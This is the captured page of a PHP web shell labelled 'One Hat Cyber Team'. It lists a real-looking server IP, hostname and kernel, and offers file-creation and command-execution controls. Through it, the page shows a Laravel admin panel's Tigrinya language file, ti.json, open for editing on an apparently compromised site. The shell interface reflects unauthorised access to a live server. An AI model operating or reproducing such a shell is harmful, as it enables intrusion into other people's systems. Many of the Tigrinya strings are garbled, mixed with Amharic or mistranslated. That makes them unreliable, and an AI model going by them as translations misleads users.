⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.26
Server IP:
15.204.235.159
Server:
Linux srv.techlup.co.ke 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Server Software:
Apache
PHP Version:
8.2.27
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
tech
/
lupo.techlup.co.ke
/
system
/
lang
/
Edit File: ti.json
{ "auth.failed": "These credentials do not match our records.", "auth.password": "The provided password is incorrect.", "auth.throttle": "Too many login attempts. Please try again in :seconds seconds.", "pagination.previous": "« Previous", "pagination.next": "Next »", "passwords.reset": "Your password has been reset!", "passwords.sent": "We have emailed your password reset link!", "passwords.throttled": "Please wait before retrying.", "passwords.token": "This password reset token is invalid.", "passwords.user": "We can't find a user with that email address.", "validation.accepted": "The :attribute must be accepted.", "validation.accepted_if": "The :attribute must be accepted when :other is :value.", "validation.active_url": "The :attribute is not a valid URL.", "validation.after": "The :attribute must be a date after :date.", "validation.after_or_equal": "The :attribute must be a date after or equal to :date.", "validation.alpha": "The :attribute must only contain letters.", "validation.alpha_dash": "The :attribute must only contain letters, numbers, dashes and underscores.", "validation.alpha_num": "The :attribute must only contain letters and numbers.", "validation.array": "The :attribute must be an array.", "validation.before": "The :attribute must be a date before :date.", "validation.before_or_equal": "The :attribute must be a date before or equal to :date.", "validation.between.array": "The :attribute must have between :min and :max items.", "validation.between.file": "The :attribute must be between :min and :max kilobytes.", "validation.between.numeric": "The :attribute must be between :min and :max.", "validation.between.string": "The :attribute must be between :min and :max characters.", "validation.boolean": "The :attribute field must be true or false.", "validation.confirmed": "The :attribute confirmation does not match.", "validation.current_password": "The password is incorrect.", "validation.date": "The :attribute is not a valid date.", "validation.date_equals": "The :attribute must be a date equal to :date.", "validation.date_format": "The :attribute does not match the format :format.", "validation.declined": "The :attribute must be declined.", "validation.declined_if": "The :attribute must be declined when :other is :value.", "validation.different": "The :attribute and :other must be different.", "validation.digits": "The :attribute must be :digits digits.", "validation.digits_between": "The :attribute must be between :min and :max digits.", "validation.dimensions": "The :attribute has invalid image dimensions.", "validation.distinct": "The :attribute field has a duplicate value.", "validation.email": "The :attribute must be a valid email address.", "validation.ends_with": "The :attribute must end with one of the following: :values.", "validation.enum": "The selected :attribute is invalid.", "validation.exists": "The selected :attribute is invalid.", "validation.file": "The :attribute must be a file.", "validation.filled": "The :attribute field must have a value.", "validation.gt.array": "The :attribute must have more than :value items.", "validation.gt.file": "The :attribute must be greater than :value kilobytes.", "validation.gt.numeric": "The :attribute must be greater than :value.", "validation.gt.string": "The :attribute must be greater than :value characters.", "validation.gte.array": "The :attribute must have :value items or more.", "validation.gte.file": "The :attribute must be greater than or equal to :value kilobytes.", "validation.gte.numeric": "The :attribute must be greater than or equal to :value.", "validation.gte.string": "The :attribute must be greater than or equal to :value characters.", "validation.image": "The :attribute must be an image.", "validation.in": "The selected :attribute is invalid.", "validation.in_array": "The :attribute field does not exist in :other.", "validation.integer": "The :attribute must be an integer.", "validation.ip": "The :attribute must be a valid IP address.", "validation.ipv4": "The :attribute must be a valid IPv4 address.", "validation.ipv6": "The :attribute must be a valid IPv6 address.", "validation.json": "The :attribute must be a valid JSON string.", "validation.lt.array": "The :attribute must have less than :value items.", "validation.lt.file": "The :attribute must be less than :value kilobytes.", "validation.lt.numeric": "The :attribute must be less than :value.", "validation.lt.string": "The :attribute must be less than :value characters.", "validation.lte.array": "The :attribute must not have more than :value items.", "validation.lte.file": "The :attribute must be less than or equal to :value kilobytes.", "validation.lte.numeric": "The :attribute must be less than or equal to :value.", "validation.lte.string": "The :attribute must be less than or equal to :value characters.", "validation.mac_address": "The :attribute must be a valid MAC address.", "validation.max.array": "The :attribute must not have more than :max items.", "validation.max.file": "The :attribute must not be greater than :max kilobytes.", "validation.max.numeric": "The :attribute must not be greater than :max.", "validation.max.string": "The :attribute must not be greater than :max characters.", "validation.mimes": "The :attribute must be a file of type: :values.", "validation.mimetypes": "The :attribute must be a file of type: :values.", "validation.min.array": "The :attribute must have at least :min items.", "validation.min.file": "The :attribute must be at least :min kilobytes.", "validation.min.numeric": "The :attribute must be at least :min.", "validation.min.string": "The :attribute must be at least :min characters.", "validation.multiple_of": "The :attribute must be a multiple of :value.", "validation.not_in": "The selected :attribute is invalid.", "validation.not_regex": "The :attribute format is invalid.", "validation.numeric": "The :attribute must be a number.", "validation.present": "The :attribute field must be present.", "validation.prohibited": "The :attribute field is prohibited.", "validation.prohibited_if": "The :attribute field is prohibited when :other is :value.", "validation.prohibited_unless": "The :attribute field is prohibited unless :other is in :values.", "validation.prohibits": "The :attribute field prohibits :other from being present.", "validation.regex": "The :attribute format is invalid.", "validation.required": "The :attribute field is required.", "validation.required_array_keys": "The :attribute field must contain entries for: :values.", "validation.required_if": "The :attribute field is required when :other is :value.", "validation.required_unless": "The :attribute field is required unless :other is in :values.", "validation.required_with": "The :attribute field is required when :values is present.", "validation.required_with_all": "The :attribute field is required when :values are present.", "validation.required_without": "The :attribute field is required when :values is not present.", "validation.required_without_all": "The :attribute field is required when none of :values are present.", "validation.same": "The :attribute and :other must match.", "validation.size.array": "The :attribute must contain :size items.", "validation.size.file": "The :attribute must be :size kilobytes.", "validation.size.numeric": "The :attribute must be :size.", "validation.size.string": "The :attribute must be :size characters.", "validation.starts_with": "The :attribute must start with one of the following: :values.", "validation.string": "The :attribute must be a string.", "validation.timezone": "The :attribute must be a valid timezone.", "validation.unique": "The :attribute has already been taken.", "validation.uploaded": "The :attribute failed to upload.", "validation.url": "The :attribute must be a valid URL.", "validation.uuid": "The :attribute must be a valid UUID.", "validation.custom.attribute-name.rule-name": "custom-message", "Dashboard": "መዋቅር", "Advertising": "ማስታወቂያ", "Subscription Reports": "ዝርዝር ብዝርዝር", "Manage Business": "ንግድ መንቀሳቀስ", "Categories": "ካበባት", "Business List": "ዝርዝር ንግድ", "Manage Plans": "ንዘርዘር ዕቅፍ", "Create Plan": "ንዘርዘር ዕቅፍ ኣበል", "Staff Management": "መንቀሳቀስ ወርሒት", "Create Staff": "መንቀሳቀስ ወርሒት ኣበል", "Manage Staff": "ንዘርዘር ወርሒት", "Messages": "መልእኽቲ", "Manage Messages": "ንዘርዘር መልእኽቲ", "CMS Manage": "CMS መንቀሳቀስ", "Manage Pages": "ንዘርዘር ገጽ", "Manage FAQs": "ንዘርዘር ጠይቓት", "Terms & Conditions": "ውሳኔን ምክንያት", "Privacy & Policy": "ጥራይን ፖሊሲ", "Testimonials": "መልክዕታት", "Features": "ባህርይታት", "Interface": "መዋቅር", "Manage Blogs": "ንዘርዘር ብሎግ", "Newsletters": "ዜና ዕብል", "Roles & Permissions": "ዕለትን ፈቃዶች", "Roles": "ዕለት", "Permissions": "ፈቃዶች", "Settings": "ቅድመ ኣይተለቀ", "Currencies": "እንደ ገንዘብ", "Notifications": "ምንከሳት", "SMS Settings": "SMS ቅድመ ኣይተለቀ", "Payment Gateway": "መስመር ንደን", "System Settings": "ስርዓት ቅድመ ኣይተለቀ", "General Settings": "ኣይተለቀ ወይም ኣለቃት", "Banner": "ባነር", "Add New Banner": "ባነር ኣዲስ ኣቀርብ", "Banner List": "ዝርዝር ባነር", "Status": "ሓሳብ", "Image": "ምስል", "Active": "ዝተገምገም", "Cancel": "ዝተቐረይ", "Save": "ንቃል", "Edit Banner": "ባነር ኣርእይ", "Advertising List": "ዝርዝር ማስታወቂያ", "Create Banner": "ባነር ኣበል", "SL": "SL", "Create Advertising": "ማስታወቂያ ኣበል", "Reset": "ዝተመለስ", "Edit Advertising": "ማስታወቂያ ኣርእይ", "Edit": "ኣርእይ", "Delete": "ዝተሰውየ", "Shop": "ሻፍ", "Add new Package": "ኣዲስ ፓኬጅ ኣቀርብ", "Shop List": "ዝርዝር ሻፍ", "Subscription Plan": "ዝርዝር ንዘርዘር ዕቅፍ", "Select Plan Category": "ንዘርዘር ዕቅፍ ካበባ ይምረጽ", "Package Name": "የዕቅፍ ስም", "Enter Package Name": "የዕቅፍ ስም ይኣቀርብ", "Business Category": "ንግድ ካበባ", "Select Business Category": "ንግድ ካበባ ይምረጽ", "Duration in Days": "ገና ቀን", "Enter number": "ቁጽሪ ይኣቀርብ", "Offer Price": "ዝተምወስእ ዋጋ", "Enter Plan Price": "የዕቅፍ ዋጋ ይኣቀርብ", "Subscription Price": "ዝርዝር ዋጋ", "Enter Subscription Price": "ዝርዝር ዋጋ ይኣቀርብ", "View": "ኣይይ", "Upgrade Plan": "ዕቅፍ ወይብ", "Edit Shop": "ሻፍ ኣርእይ", "Select Category": "ካበባ ይምረጽ", "Shop/Business Name": "ሻፍ/ንግድ ስም", "Enter Shop/Business Name": "ሻፍ/ንግድ ስም ይኣቀርብ", "Package": "ፓኬጅ", "Select a package": "ፓኬጅ ይምረጽ", "Name": "ስም", "Enter Name": "ስም ይኣቀርብ", "Role": "ሚኒስትር", "Select a role": "ሚኒስትር ይምረጽ", "Email": "ኢሜይል", "Enter Email": "ኢሜይል ይኣቀርብ", "Phone": "ስልኪ", "Enter Phone Number": "ስልኪ ቁጽሪ ይኣቀርብ", "Password": "የግል ቃል ይይ", "Enter Password": "የግል ቃል ይኣቀርብ", "Confirm password": "የግል ቃል ይምርኣይ", "Enter Confirm password": "የግል ቃል ይምርኣይ ይኣቀርብ", "Address": "ኣድራሻ", "Enter Address": "ኣድራሻ ይኣቀርብ", "Select Country": "ምረጥ አገር", "Select a Country": "ምረጥ አገር", "Balance": "ወይዘር", "Enter Balance": "ወይዘር ኣንቀጽ", "Search...": "ፈልጥ...", "Business Name": "የባሕርያ ስም", "Last Enroll": "መጨረሻ ቀን ወይዘር", "Expired Date": "ዝወይዘር ቀን", "Action": "እንቅስቃሴ", "Select A Plan": "ምረጥ እትም", "Select One": "ምረጥ አንድ", "Price": "ዋጋ", "Enter plan price or select a plan": "የእትም ዋጋ ኣንቀጽ ወይ ምረጥ እትም", "Payment Gateways": "የክፍያ መንገዶች", "Select A payment gateway": "ምረጥ የክፍያ መንገድ", "Notes": "ማስታወሻ", "Enter notes": "ማስታወሻ ኣንቀጽ", "Business View": "የባሕርያ ትንበያ", "Created date": "ዝነብር ቀን", "Category": "ምድብ", "Add new Category": "ኣዲስ ምድብ ይክፈል", "View List": "ዝንበይ ዝርዝር", "Buisness Name": "የባሕርያ ስም", "Enter Description": "ንባር ኣንቀጽ", "Description": "ንባር", "Edit Business Category": "የባሕርያ ምድብ ይማርከ", "Enter Buisness Description": "የባሕርያ ንባር ኣንቀጽ", "Business Categories List": "የባሕርያ ምድብ ዝርዝር", "Add New": "ኣዲስ ይክፈል", "Reports": "ዘመድር", "All": "ሁሉ", "Active User": "ኣርከት ተጠቃሚ", "Deactive User": "ወይዘር ተጠቃሚ", "Date": "ቀን", "SL.": "SL.", "Invoice": "የምዝገባ", "Customer Name": "የደንበኛ ስም", "Amount": "መጠን", "View Report": "ዘመድር ይዝረይ", "Download Report": "ዘመድር ይወስድ", "User View": "ተጠቃሚ ትንበያ", "Shop Name": "የሻጭ ስም", "Country": "አገር", "Reason": "ምክንያት", "Are You Sure?": "ንቁጽእ ኣለኻ?", "You won't be able to revert this!": "እዚ ኣንታ ምንዛም ይከሊይ ይለይ!", "Yes, Delete It!": "እወ, ይሰርይ እዚ!", "Add Currency": "ኣዲስ ገንዘብ ይክፈል", "Code": "ኮድ", "Symbol": "ምልክት", "Position": "ኣካል", "Inactive": "የለን", "Make Default": "ወንድና ኣይከል", "Edit Currency": "የገንዘብ ይማርከ", "Currency": "ገንዘብ", "Total Businesses": "ዓለም ባሕርያ", "Total Expired Businesses": "ዓለም ዝወይዘር ባሕርያ", "Total Plan Subscribes": "ዓለም ይስዕዳ ይኣክል", "Total Business Categories": "ዓለም የባሕርያ ምድብ", "Total Plans": "ዓለም ይኣክል", "Total Staffs": "ዓለም ተሳታፊ", "Finance Overview": "ዝተለከተ ኣይንዋል", "Gateway Settings": "የተገናኝ ምርጫ", "Payment Gateway Settings": "የክፍያ የተገናኝ ምርጫ", "GATEWAY IMAGE": "የተገናኝ እቅፍ", "GATEWAY NAME": "የተገናኝ ስም", "Gateway Charge": "የተገናኝ ክፍያ", "Gateway Currency": "የተገናኝ ገንዘብ", "Gateway Mode": "የተገናኝ አይነት", "Is Manual": "ወይ ዝተወኪ", "Yes": "እወ", "No": "አይ", "Label": "ምልክት", "Enter label name": "ምልክት ኣንቀጽ", "Select Required/Optional": "ምረጥ ወይ ኣይንዋል", "Required": "ወይ ኣይንዋል", "Optional": "ኣይንዋል", "Add new row": "ኣዲስ መሳርሕ ይክፈል", "INSTRUCTIONS": "ዝምዝምታት", "Enter payment instructions here": "የክፍያ ምርጫ ኣንቀጽ እዚ", "Messages List": "የመልእክት ዝርዝር", "Search": "ፈልጥ", "Company Name": "የኩባንያ ስም", "Message": "መልእክት", "Notifications List": "ዝኾነ መረጃታት", "Today": "ዛሬ", "Last 7 Days": "ዝዕለት 7", "Last 15 Days": "ዝዕለት 15", "Last Month": "ዝዕለት ወርሕ", "Last Year": "ዝዕለት ዓመት", "Created At": "ቀትሪ ምድር", "Read At": "ቀትሪ ይዓይን", "Add New Payment Type": "ኣነግዕ ኣዳራሽ ክፍያ ዓይነት", "Enter Payment Type": "ኣነግዕ ክፍያ ዓይነት", "Edit Payment Type": "ኣሕዋር ክፍያ ዓይነት", "Payment Type": "ክፍያ ዓይነት", "Add Payment Type": "ኣነግዕ ክፍያ ዓይነት", "Per Page- 10": "በገጽ- 10", "Per Page- 25": "በገጽ- 25", "Per Page- 50": "በገጽ- 50", "Per Page- 100": "በገጽ- 100", "Assigned Role": "ወይስ ክርእይ", "Assign Role To User": "ወይስ ክርእይ ንተጠቃሚ", "Select User": "ይምረጽ ተጠቃሚ", "User": "ተጠቃሚ", "Select Role": "ይምረጽ ክርእይ", "Add Subscription Plan": "ኣነግዕ ዕቅፍ መርገድ", "Package List": "ዝተዋህዱ ዝርዝር", "Add New Features": "ኣነግዕ ኣዳራሽ አሰራርት", "Enter features": "ኣነግዕ አሰራርት", "Edit Subscription Plan": "ኣሕዋር ዕቅፍ መርገድ", "Edit Package": "ኣሕዋር ዝተዋህዱ", "Enter Duration Days": "ኣነግዕ ዝዕለት ቀን", "Deactive": "ይቅርታ", "Create Plans": "ዕቅፍ መርገድ ኣርእይ", "User Profile": "ኣስመራ ተጠቃሚ", "Registration Date": "ቀን ኣምርጻ", "Enter Your Name": "ኣነግዕ ስምኻ", "Enter Your Email": "ኣነግዕ ኢሜይልኻ", "Profile Picture": "ምስል ኣስመራ", "Current Password": "ዘለኻ ፓስወርድ", "Enter Your Current Password": "ኣነግዕ ዘለኻ ፓስወርድ", "New Password": "ኣዳራሽ ፓስወርድ", "Enter New Password": "ኣነግዕ ኣዳራሽ ፓስወርድ", "Save Changes": "ቅድሚ ዝይትወይይ", "Add New Role": "ኣነግዕ ኣዳራሽ ክርእይ", "Set role permissions": "ምዝውር መደበር ወክርእይ", "Role Name": "ስም ክርእይ", "Enter role name": "ኣነግዕ ስም ክርእይ", "Role Permissions": "መደበር ወክርእይ", "Setup role permissions": "ምዝውር መደበር ወክርእይ", "Select All": "ይምረጽ ሁሉ", "Roles List": "ዝርዝር ክርእይ", "Add role, if it does not exist": "ኣነግዕ ክርእይ ኣይኮነን", "Edit Role": "ኣሕዋር ክርእይ", "Privacy & Policy Settings": "ምዕባለ እንዳ ምስክር", "Update": "ኣዘውግዝ", "Term & Condition Settings": "ምዕባለ ዕቅፍ ወከምር", "Title": "ርዕስ", "Enter Title": "ኣነግዕ ርዕስ", "Copy Right": "ወክርእይ ሞተነ", "Admin Footer Text": "ገላዊ ኣዳራሽ ጽሕፈት", "Enter Text": "ኣነግዕ ጽሕፈት", "Admin Footer Link Text": "ገላዊ ኣዳራሽ ወከል", "Admin Footer Link": "ገላዊ ኣዳራሽ ወከል", "Enter Link": "ኣነግዕ ወከል", "Main Header Logo": "ዋና ምልክት ጽሕፈት", "Common Header Logo": "መዋና ምልክት ጽሕፈት", "Footer Logo": "ወከል ምልክት", "Admin Logo": "ገላዊ ምልክት", "Favicon": "ዋና ትህተት", "Don't Use Any Kind Of Space In The Input Fields": "ኣይትግብዝ ኣባር ቦታ ወባዓላት ኣብ ናይ መግቢ ቦታ", "App": "ኣፕ", "Drivers": "ንቕልብት", "Storage Settings": "ኣንቀዋዊ ኣይተረገም", "Mail Configuration": "ዝስተዳድር ዓይነት", "Others": "ኣሎታ", "APP_NAME": "ስም ኣፕ", "APP_KEY": "ኣይተወሰነ ኣፕ", "APP_DEBUG": "ምንም ኣለዉ ኣይወሰን", "APP_URL": "ዩአርኤል ኣፕ", "QUEUE_MAIL": "ምስጥር ዋይል", "MAIL_DRIVER_TYPE": "ዝስተዳድር ንቕልብት", "MAIL DRIVER": "ዝስተዳድር ንቕልብት", "MAIL_HOST": "ዩርዳ ዋይል", "MAIL_PORT": "ማይ ተቐባለላ", "MAIL_USERNAME": "የይቕል ዋይል", "MAIL_PASSWORD": "የንዋይ ዋይል", "MAIL_ENCRYPTION": "ንኳንየዋም ዋይል", "MAIL_FROM_ADDRESS": "ኣብ ዩርዳ ዋይል", "MAIL_FROM_NAME": "ኣብ ዩርዳ ስም", "QUEUE COMMAND Path": "ዋይል ተወሳሲ ምንነት", "CACHE_DRIVER": "ዝስተዳድር ንቕልብት", "Recommended": "ይወከል", "QUEUE_CONNECTION": "ዋይል መሰረት", "SESSION_DRIVER": "ዝስተዳድር ስልጣን", "SESSION_LIFETIME": "ዓለም ስልጣን", "REDIS_PORT": "ምዕብለት ሪድስ", "REDIS_URL": "ዩአርኤል ሪድስ", "REDIS_PASSWORD": "የንዋይ ሪድስ", "AWS S3 Storage Bucket": "ወተን ኣንቀዋዊ ምንም ንዓቀብ", "Fill up this credentials if you want to use AWS S3 Storage Bucket": "እዚ ኣብዚ መረጃ የክብዕ ንዓቀብ ወተን ኣንቀዋዊ ምንም ይምጽእ", "Wasabi Storage Bucket": "ወተን ኣንቀዋዊ እዋማ", "public (uploads folder)": "ግንዛብ (እታ ኣንቀዋዊ ምንም በዛ)", "AWS_ACCESS_KEY_ID": "AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY": "AWS_SECRET_ACCESS_KEY", "AWS_DEFAULT_REGION": "AWS_DEFAULT_REGION", "AWS_BUCKET": "AWS_BUCKET", "Fill up this credentials if you want to use Wasabi Storage Bucket": "እዚ ኣብዚ መረጃ የክብዕ ንዓቀብ ወተን ኣንቀዋዊ እዋማ ይምጽእ", "WAS_ACCESS_KEY_ID": "WAS_ACCESS_KEY_ID", "WAS_SECRET_ACCESS_KEY": "WAS_SECRET_ACCESS_KEY", "WAS_DEFAULT_REGION": "WAS_DEFAULT_REGION", "WAS_BUCKET": "WAS_BUCKET", "WAS_ENDPOINT": "WAS_ENDPOINT", "CACHE_LIFETIME": "ዓለም ኣንቀዋዊ ምንም", "Paid": "ንኩዕ", "Reject": "ኣለኽ", "Why are you reject It?": "ምንታይ ኣለኽ ንዚ?", "Enter Reason": "ኣንብብ ምንዝን", "Confirm": "ወከስ", "Subscriptions List": "ዝተመርጸ ዝምድና ዝዛርነ", "Started": "ተጀመረ", "End": "መውጣ", "Gateway Method": "ዕድል ምሕረት", "Are you sure?": "እንደክ ይኹን?", "Add New Testimonial": "ኣንብብ ኣዲስ መውጣ", "Client Name": "ስም ኣዋጅ", "Enter Client Name": "ኣንብብ ስም ኣዋጅ", "Stars": "ንነት", "Works At": "ኣብዚ ይሰርሕ", "Client Image": "ፎቶ ኣዋጅ", "Review": "ኣብዚ ንዳዊ", "Enter text": "ኣንብብ እንተነግር", "Enter review message here": "ኣንብብ መልእኽቲ ንዳዊ ኣይነት", "Edit Testimonial": "ኣርእዮ መውጣ", "Testimonials List": "ዝምድና መውጣ", "Create New": "ኣፈልጠ ኣዲስ", "Add New Staff": "ኣንብብ ኣዲስ ዓለም", "Full Name": "ሙሉእ ስም", "Enter Email Address": "ኣንብብ ኢሜይል ኣይነት", "Edit Staff": "ኣርእዮ ዓለም", "Staff List": "ዝምድና ዓለም", "User Email": "ኢሜይል ተጠቃሚ", "User Role": "ስራሕ ተጠቃሚ", "Comments": "ኣብዚ", "Comment List": "ዝምድና ኣብዚ", "Create Blog": "ኣፈልጠ ብሎግ", "Blog List": "ዝምድና ብሎግ", "Select a status": "ዝምርጽ ስርዓት", "Tags": "መርገስ", "Enter tags name": "ኣንብብ ስም መርገስ", "SEO Meta Tags": "መርገስ ዚአባር", "Meta Title": "መወዳእታ እንደነ ነው", "Meta Description": "መግለጻ እንደነ ነው", "Enter meta Description": "ኣንብብ መግለጻ እንደነ ነው", "Comment": "ኣብዚ", "Edit Blog": "ኣርእዮ ብሎግ", "Blogs": "ብሎግ", "Create Faqs": "ኣፈልጠ ኣዳሪ ሓይሊ", "Add New FAQs": "ኣንብብ ኣዲስ ኣዳሪ ሓይሊ", "Question": "ጥዕስ", "InActive": "ወበት", "Answer": "መልሲ", "Enter question answer here": "ኣንብብ መልሲ ጥዕስ እዚ", "Edit Faqs": "ኣርእዮ ኣዳሪ ሓይሊ", "FAQS List": "ዝምድና ኣዳሪ ሓይሊ", "View Details": "ዝተመለከተ ዝርዝር", "Create Feature": "ኣፈልጠ ውስኽ", "Add New Feature": "ኣንብብ ኣዲስ ውስኽ", "Backgroud Color": "ዕረፍ ቀለም", "Enter Color": "ኣንብብ ቀለም", "Edit Feature": "ኣርእዮ ውስኽ", "Features List": "ዝምድና ውስኽ", "Create Interfaces": "ኣፈልጠ ኣይተለቀ መተያብ", "Add New Interface": "ኣንብብ ኣዲስ ኣይተለቀ መተያብ", "Edit Interface": "ኣርእዮ ኣይተለቀ መተያብ", "Interfaces List": "ዝምድና ኣይተለቀ መተያብ", "Newsletters List": "ዝምድና ወቅታዊ መረጃ", "Page for Updating Website Sections": "ገጽ ምርጽ ኣዳር መዋቅር ድር", "Slider Section": "ስሊደር ክፍል", "Header Section": "ሀዳር ክፍል", "Feature Section": "ውስኽ ክፍል", "Interface Section": "ኣይተለቀ መተያብ ክፍል", "Watch Section": "ወይብ ክፍል", "Testimonial Section": "መውጣ ክፍል", "Blog Section": "ብሎግ ክፍል", "About us Page": "ገጽ ኣብ ንንበረ", "Terms And Conditions": "ዕድልን ሕጊ ወነድር", "Privacy Page": "ገጽ ጽሑፍ", "Contuct us Page": "ገጽ ኣይነት ይናብ", "Pricing Section": "ዋጋ ክፍል", "Footer Section": "ንጻዕ ክፍል", "Social Medias": "ማዕበለ ስርዓት", "Button One": "ቁጽሪ ኣንድ", "Button Text": "ቁጽሪ ጽሑፍ", "Button One Link": "ቁጽሪ ኣንድ ኣይነት", "Button Two": "ቁጽሪ ሁለት", "Button Two Link": "ቁጽሪ ሁለት ኣይነት", "Scanner Text": "ምርጭ ጽሑፍ", "Scanner Image": "ምርጭ ፎቶ", "Slider Image": "ስሊደር ፎቶ", "Header Button Text": "ሀዳር ቁጽሪ ጽሑፍ", "Header Button Link": "ሀዳር ቁጽሪ ኣይነት", "Enter Header link": "ኣንብብ ሀዳር ኣይነት", "Section Title": "የቅርብ ዕለት", "Enter Section Title": "ኣንብብ የቅርብ ዕለት", "Interface Title": "ኣይተለቀ መተያብ ዕለት", "Watch Title": "ወይብ ዕለት", "Button Link": "ቁጽሪ ኣይነት", "Watch Image": "ወይብ ፎቶ", "Blog Title": "ብሎግ ዕለት", "Read More Button Text": "ኣይነት ይስተብስ ጽሑፍ", "View All Button Text": "ዝተመለከተ ኣይነት ምስተይ", "View All Link": "ዝተመለከተ ኣይነት", "Testimonial Title": "መውጣ ዕለት", "Enter Short Title": "ኣንብብ ኣንድ ዕለት", "Long Title": "ዓለም ዕለት", "About Image": "ምስል ንነይ", "Description One": "መግለጺ ኣንድ", "Description Two": "መግለጺ ሁለት", "Option": "ኣማራጭ", "Icon": "አይኮን", "Plan Button Url": "ዋና ኣይነት ምዕይለ ኣማራጭ", "Short Title": "ኣንብብ ኣንድ ዕለት", "Right Footer Title": "ዓለም ዕለት ንጻዕ ይወዳ", "Middle Footer Title": "ዓለም ዕለት ተላላይ ንጻዕ", "Apple App Link": "ኣይነት ኣፕ ኣፕል", "Apple App": "ኣፕ ኣፕል", "Google Play Link": "ኣይነት ኣፕ ጉግል ፕሌይ", "Google Play App": "ኣፕ ጉግል ፕሌይ", "Right Footer": "ውን ንጻዕ", "Link": "ኣይነት", "Middle Footer": "ተላላይ ንጻዕ", "Left Footer": "ስታ ንጻዕ", "Footer Socials": "ንጻዕ ማዕበለ ስርዓት", "Forgot Password": "ዝተረዳየ ፕላስዎርድ", "Enter the email address associated with your account": "ኣንብብ ኢሜይል ኣይነት ዝነብር ኣባልነት", "Enter your Email": "ኣንብብ ኢሜይል ይዋዕሉ", "Continue": "ይቀጽል", "Back to Login": "ወይኒ ለውዕል", "Login": "ወይኒ ለውዕል", "Welcome to": "ከመ ይቕሬት", "Welcome back, Please login in to your account": "ከመ ይቕሬት ብዝተመለሰ ከባሪ ይወይን ኣባልነት", "Remember me": "ሓይሊ ክዕበ", "Forgot Password?": "ዝተረዳየ ፕላስዎርድ?", "Super Admin": "ኣበይ አዳም", "Admin": "አዳም", "Manager": "ምንገር", "Reset Password": "ወይኒ ፕላስዎርድ", "Change Password": "ይምዕይል ፕላስዎርድ", "Create new password, it must be Strong password.": "ኣፈልጠ ኣዲስ ፕላስዎርድ ዝምዕይል ይምዕይል ኣበይ ፕላስዎርድ.", "Confirm Password": "ኣይነት ፕላስዎርድ", "You Have": "ንሳ ኣለዎ", "new Notifications": "ንሳ ዝምድና ወኣይ", "Mark all Read": "ይርይቡ ስለ ዝምድና ክርእይ", "View all notifications": "ዝተመለከተ ኣይነት ዝምድና", "Clear cache": "ምስእ ኣይነት", "My Profile": "ዕብዚ ዝውይ", "Logout": "ውሕስት", "About Us": "ንነይ", "Home": "መንግስቲ", "Pricing": "ዋጋ", "Pages": "ገጽ", "Blog": "ብሎግ", "Privacy Policy": "ዕርግ ዝምድና", "Contact Us": "ንነይ ይደውይ", "You are having this email because you have requested for a password reset.": "ንስን ይድለ ዝሕበርኩ ኢዩ ዚይተወልው ይተረዳየ ፕላስዎርድ ወይው", "Your verification code is:": "ናይ ዝተመለከተ ኮድ እዚ እዩ:", "This password reset code will expire in 60 minutes.": "እዚ የተርዓይ ፕላስዎርድ ኮድ ዝብቐት 60 ደቂቀ ይወርደይ", "If you did not request a password reset, no further action is required.": "እንታይ ይድለ ይድለ እዚ ትዓቂ ሕቡር ምርገ ይከውር", "Regards": "በከለ", "All right reserved": "አታታ ዝስሓል", "Hi": "ሰላም", "Dear": "ንዓይ", "your OTP code is": "ንስ የከርስ ኮድ እዚ እዩ", "Please do not share this PIN with anyone": "እተወርሐ ይቀጽሉ ይምዝምይ ዘይኩም ወይን", "Best Regards": "ዝበለይ ኣወቅል", "Gateway Name": "ኣይነት መዳረሻ", "Subscription Name": "ዝተመለሰ ኣይነት", "Payable Amount": "ዋጋ እዋን", "Phone Number": "ቀይነ ተክሊ", "Enter your phone number": "ኣንብብ ቀይነ ተክሊ", "Pay Now": "ከይተክል", "Next": "ዝስታ", "Previous": "ወይድሉ", "Free": "ነፃ", "Features Of Free Plan": "ኣይነት ኣንድ ናብ ዝምድነ", "Choose Plan": "ዝይዋይ ኣይነት", "Blog Details": "ዝሓርቡ ብሎግ", "Leave a Comment Here": "ወይይኡ እዚ ኣዝንኩ", "Your email address will not be published": "ይዋዕሉ ወይይ ኣንብብ ምንባለ", "Enter your name": "ኣንብብ ስም", "Enter your email": "ኣንብብ ኢሜይል", "Enter your comment": "ኣንብብ እዚ ምርገ ወይ", "Recent Posts": "ዕረፍታ ውሉይ", "Create a Free Account": "ይቀመይ ይሓይም ኣንዱ", "Enter full name": "ኣንብብ ሙሉ ስም", "Enter phone number": "ኣንብብ ቀይነ ተክሊ", "Enter email address": "ኣንብብ ኢሜይል ኣይነት", "Company": "ኣንብብ ዓለም", "Enter company name": "ኣንብብ ዓለም ስም", "Enter your message": "ኣንብብ ምርገ ወይ", "Pricing Plan": "ናብ ዋጋ ኣይነት", "Subscription Plans": "ዝተመለሰ ኣይነት", "Plan List": "ዝይዋይ ኣይነት ዝተረከበ", "Work At": "ናብ ዝምድና", "Show- 10": "ይወዳ 10", "Show- 25": "ይወዳ 25", "Show- 50": "ይወዳ 50", "Show- 100": "ይወዳ 100", "Duration": "ዓወት", "Select": "ይወስድ", "Currency List": "ዝምምእ ገንዘብ", "Default": "ምዕባለ", "Country Name": "ዝርዝር ምዕባለ", "View Website": "ይወዳ ድርጅት", "Contact Messages": "ንነይ ምስጢር", "Total Shop": "ጠቅላላ ዕቃ ማዕከል", "Expired Businesses": "ተወው ዕቃታት", "Plan Subscribes": "መድረኽ ነጻነት", "Total Categories": "ጠቅላላ ዝዕባዊ ኣይነቶት", "Recent Register": "ድምቀት ዕንቅ", "Date & Time": "ዕለት እና ሰዓት", "View All": "ሓርነት ኣብ ዘለዎ", "Add new Business": "ኣዲስ ዕቃ እትገደል", "Enter Company Name": "የንኣት ስም ይወስድ", "Edit Business": "ዕቃታት ዝታለየ", "Create Business": "ዕቃ ይገነባ", "Enter Buisness Name": "ዕቃታት ስም ይወስድ", "Note: Enter embedded video link": "ኣርከት: ተለመድ ዲይት በውድብ ክወውስ", "Enter title": "ርእስ ይወስድ", "Enter Code": "ኮድ ይወስድ", "Enter Symbol": "ምልክት ይወስድ", "Select a position": "ምዃባ ይምርጽ", "left": "ወይን", "right": "ዓይን", "TIMEZONE": "ገንዘብ ማይን", "Note :": "ኣርከት :", "If you are using MAIL QUEUE after Changing The Mail Settings You Need To Restart Your Supervisor From Your Server": "ወይ ኣማንትዝውወት በት ምስንትድ ወይ እምቲያሳም ልዕልኩይ 